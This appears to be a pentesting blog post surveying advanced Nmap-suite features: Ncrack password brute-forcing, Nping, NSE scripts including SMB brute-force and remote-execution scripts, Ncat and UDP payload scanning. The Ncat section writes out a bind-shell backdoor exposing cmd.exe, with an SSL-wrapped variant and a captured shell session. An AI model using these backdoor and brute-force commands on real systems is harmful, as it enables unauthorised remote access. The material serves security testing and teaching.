Advanced Nmap

Some of the guys I hack with and I have been talking about the “core” toolset in pentesting… like what could you absolutely not go in without? What we came up with is:

  • nmap
  • metasploit
  • ettercap
  • burp
  • Wireshark

There are tons of tools that came close to that bracket, other proxies, scanners, other MiTM tools, but these tools have a special place in our hearts. These tools have encompassed so many pentesting needs that it’s hard to find something this combo can’t do. This is also clearly for external and internal pentests, that do NOT include social, OSINT, and other type of tests.

Tonight I wanted to share some Nmap stuff that I’ve been using lately or am getting ready to start using.

It’s hard to go over Nmap in one writeup for a few reasons. One is it’s default purpose (scanning) is a topic in an of itself. Correct timing, parallelism, scan types, IDS evasion, internal scans, external scans, etc. These could all have posts of thier own, all with heated debate about the validity of each.

The second reason is Nmap is no longer a scanner. Not that anyone who reads this blog wouldn’t know that but, nmap has grown into a beast of some sorts. Nmap has effectively extended itself to replace Medusa (with Ncrack), Hping (with Nping), Nessus/OpenVAS (with Nmap Scripting Engine), Netcat (with Ncat), UnicornScanner/UDPProtoScanner (New Nmap UDP scanning), as well as has a host of bolted on scripts that extend Nmap beyond just a normal users use case. Today we’ll just go through a few cool things, as you can find a lot about general nmap scanning techniques from the below books:


Ncrack is a command line password bruteforcer like hydra and medusa. Up until recently I was a stalwart Medusa user but what brought me over (mostly) was the superior SSH library, RDP password bruting, and easy nmap-like syntax. Should you want to audit a whole class C for ssh passwords Ncrack makes this easy:

[plain]ncrack -p 22[/plain]

Ncrack supports the following protocols:

  • FTP
  • TElNET
  • SSH
  • RDP
  • HTTP(S)
  • SMB
  • POP3(s)

Comparing this to Medusa it seems like a lot less to offer, Medusa does SQL bruteforcers,  R-service bruteforcers, VNC, VMWare Authd, SNMP, etc, but in most cases I use Ncrack with Medusa as a backup. The rest of those protocols I can mostly get through Metasploit which is one less layer of abstraction. In some cases Ncrack can be less stable, in these cases rely on ole medusa to CYA. We recommended using password lists from SkullSecurity, Ron has made an extensive list of popular site breaches and their associated leaked passwords for pentesters to use with bruteforcing tools.


Nping is another summer of code project designed (presumably) to take over Hping duties. Since there is a plethora of Hping versions to carry around i find it refreshing to have an updated tool for packet manipulation. In general Hping’s utility is to generate custom packets. Using hping is way easier than implementing custom packets in a scripting language like python. A major drawback to Hping was its lack of inherent “scanner” type functionality, meaning that unless you created a bash wrapper or TCL script it was a one target type of tool. Nping fixes this in stellar fashion by supporting Nmap syntax. Although Nmap has done it’s best to implement the type of scanning one would do with Hping/Nping nothing beats having a command line tool to send custom packets. Custom packets being a very ambiguous term, Hping has traditionally been used to test firewalls, evade IDS, send POC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of  customization but Nping is a welcome addition to packet crafting tools.

NSE (Nmap Scripting Engine)

The Nmap Scripting Engine is a lua framework to do pretty much anything within nmap, with the power of nmap. If you think about it, it was a natural progression. Nmap was already doing service version fingerprinting and banner checking… isn’t that what bigtime vulnerability scanners do? Vulnscanner = PortScanner + Service Version Checking ( using banner reading, TCP/IP response timing, and other socket response type regexing/signatures) + vulnerability correlation. I mean, theres a bit more to it, but not much. You can see that in that list theres not much that nmap didn’t already do. Plus adding a simple scripting language that anyone can write to the powerful underlying NSE makes for empowered testers. Some bigtime firms I know have taken vuln scanners out of the rotation in their pentests opting for specific targeted NSE scripts.  In addition NSE offers a lot to both netpen and webpen. A plethora of scripts are webpen based. There are a modest 194 scripts in SVN but I know that not everyone is releasing thier scripts, which imo hurts the projects awesomeness. Lame pentesters are lame. Here are some of our favs:

  • banner – A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the nmap fingerprints database and pipe the output to files for later inspection.
  • dns-cache-snoop – Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
  • hostmap – Tries to find hostnames that resolve to the target’s IP address by querying the online database at Replaces Hostmap which is intermittently broken =(
  • http-brute – Performs brute force password auditing against http basic authentication. Saves some time setting up Burp to do this.
  • http-enum – Enumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum’s fingerprint database (in fact we are credited in that source). Dirbuster and wfuzz are great and focus on  large sets of common words for directory bruteforcing, we use http-enum for more targeted framework bruteforcing… and it works.
  • smb-enum-shares – Attempts to list shares using the srvsvc.NetShareEnumAll MSRPC function and retrieve more information about them using srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names are checked.
  • smb-brute – Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
  • smb-check-vulns – Checks for vulnerabilities: MS08-067, etc, etc.
  • smb-psexec – This script implements remote process execution similar to the Sysinternals’ psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of system, or even installing a backdoor on a collection of computers.
  • As well as the more targeted SNMP, MSSQL,  MYSQL, ORACLE, and Lotus enumeration and bruteforce scripts.

In addition, Andre Gironda (@atdre) pointed us to NSE Vulscanner this week which correlates services banners to OSVDB vulns… which is… WICKED. In this thread you can see that, yes, there are some logistical problems with vulns not being verified/false positives but, this NSE script is a powerful tool in addition to your blanket portscans. Think of how Armitage and DBAutopwn work in Metasploit. Portscan -> Vuln correlation per port. Well now you are not only leveraging the Metasploit database, but the WHOLE OSVDB at no cost to you. As service level detection becomes available for this, well, you can imagine a lot of vuln scan companies running scared. A Sample run looks like so:

[plain]nmap -PN -sS -sV –script=vulscan -p25

25/tcp open smtp syn-ack Exim smtpd 4.69
| vulscan: [5330] Exim Configuration File Variable Overflow
| [5896] Exim sender_verify Function Remote Overflow
| [5897] Exim header_syntax Function Remote Overflow
| [5930] Exim Parenthesis File Name Filter Bypass
| [12726] Exim -be Command Line Option host_aton Function Local Overflow
| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow[/plain]

So, NSE… get on it. Here are some links to get you hyped:

PS – I like to search for cool non-trunk scripts like this in google:  ”nse script nmap”  and to the left sort results by last 6 months (i do this for a lot of hacking tools actually)


Ncat is Nmap’s answer to Netcat. It pretty much does everything netcat can do plus implements IPV6, UDP,  and SSL socket connections… no more stunnel! It also has hex output options, SOCKS4 + HTTP Proxying,  and built in access control. Irongeek has a video basically showing all the flag actions in practice, you can find that here. Ncat also comes with a nifty exec feature, here we are ssl wrapping our backdoor:

Backdoor ncat:

[plain]C:\Windows\System32> ncat -l –exec “cmd.exe” 1337[/plain]


[plain]root@bt:~# ncat 1337
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

Volume in drive C has no label.
Volume Serial Number is 00E1-F423

Directory of c:\Windows\System32

04/15/2011 03:20 AM .
04/15/2011 03:20 AM ..
07/13/2009 10:37 PM 0409
09/27/2010 10:33 AM 1033

Traffic Inspection of backdoor before SSL:

SSL backdoor:

[plain]C:\Windows\System32> ncat -l –ssl –exec “cmd.exe” 1337[/plain]


[plain]root@bt:~# ncat –ssl 1337[/plain]

Traffic Inspection of “dir” command using backdoor after SSL:

Nmap UDP Payload Scanning

The issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP Payload to a service usually results in a dropped packet. This is bad news for pentesters, as we want a full and accurate scan of our targets. UDP Payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send it a legitimate payload that works with the service we are scanning. If we receive a response it indicates an open port. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, sometimes they are buggy and lack the Nmap type features we want in a port scanner.

Newer versions of Nmap fix that dilemma by adding the following UDP fingerprints for scanning:

udp/7 echo
udp/53 domain
udp/111 rpcbind
udp/123 ntp
udp/137 netbios-ns
udp/161 SNMP
udp/177 xdmcp
udp/500 ISAKMP
udp/520 route
udp/1645 RADIUS
udp/1812 RADIUS
udp/2049 NFS
udp/5353 zeroconf
udp/10080 amanda

Auxiliary Nmap Scripts

There are several scripts for manipulating output and extending Nmap.

Sample output:

root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log
Scan_results generated for 2011-04-26_16.15.29

–[ HOST – List ]——–

IP :: Port :: Service -> Server_Type
————————–::——–::———————–>———————————————————– :: 10243 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). Ignored State: closed (12325) :: 8834 :: http -> NessusWWW :: 5357 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). :: 3389 :: microsoft-rdp -> Microsoft Terminal Service. :: 3306 :: mysql -> MySQL (unauthorized). :: 2869 :: icslap? -> . :: 1241 :: ssl.nessus -> Nessus Daemon (NTP v1.2). :: 1036 :: nsstp? -> . :: 1035 :: multidropper? -> . :: 1027 :: msrpc -> Microsoft Windows RPC. :: 1026 :: LSA-or-nterm? -> . :: 1025 :: msrpc -> Microsoft Windows RPC. :: 990 :: ftps? -> . :: 912 :: vmware-auth -> VMware Authentication Daemon 1.0 (Uses VNC :: 554 :: rtsp? -> . :: 445 :: netbios-ssn -> . :: 443 :: ssl.http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
v5.10.1). :: 139 :: netbios-ssn -> . :: 135 :: msrpc -> Microsoft Windows RPC. :: 80 :: http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.

Happy hacking!

Leave a Reply

Your email address will not be published. Required fields are marked *